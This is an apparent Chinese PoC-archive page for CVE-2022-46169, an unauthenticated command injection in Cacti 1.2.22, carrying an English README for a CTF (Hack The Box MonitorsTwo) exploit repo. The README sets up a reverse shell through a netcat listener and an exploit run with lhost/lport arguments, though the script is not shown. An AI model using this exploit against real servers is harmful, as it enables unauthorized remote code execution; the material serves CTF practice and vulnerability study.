关联漏洞
标题:
Cacti 命令注入漏洞
(CVE-2022-46169)
描述:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 Cacti v1.2.22版本存在命令注入漏洞,该漏洞源于未经身份验证的命令注入,允许未经身份验证的用户在运行Cacti的服务器上执行任意代码。
介绍
# CVE-2022-46169 PoC - Unauthenticated RCE in Cacti 1.2.22
This repo contains an exploit for CVE-2022-46169, affecting Cacti 1.2.22. This vulnerability allows an unauthenticated attacker to execute arbitrary code on the affected system.
If you want a detailed write up of how this exploit is possible please reference [this](https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/) Rapid7 post. They go into great detail on specifics.
I wrote this code, with help from chatGPT for a Hack The Box machine called MonitorsTwo for educational purposes
## Usage
```
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
```
Set up a listener on your local machine with netcat `nc -lvnp 9001`
Run the exploit against the target
`python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001`
## Disclaimer
This Proof of Concept (PoC) is meant strictly for educational and testing objectives. Engaging this PoC on any system or network without clear authorization from the system owner is unlawful and could lead to legal action. The creator accepts no responsibility for any harm arising from the proper or improper application of this PoC. Employ at your own peril.
## References
https://chat.openai.com/
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/
文件快照
[4.0K] /data/pocs/4a0544191fb1ca1c599f7ecc48746d6c9d171f25
├── [1.4K] CVE-2022-46169.py
├── [ 34K] LICENSE
└── [1.4K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。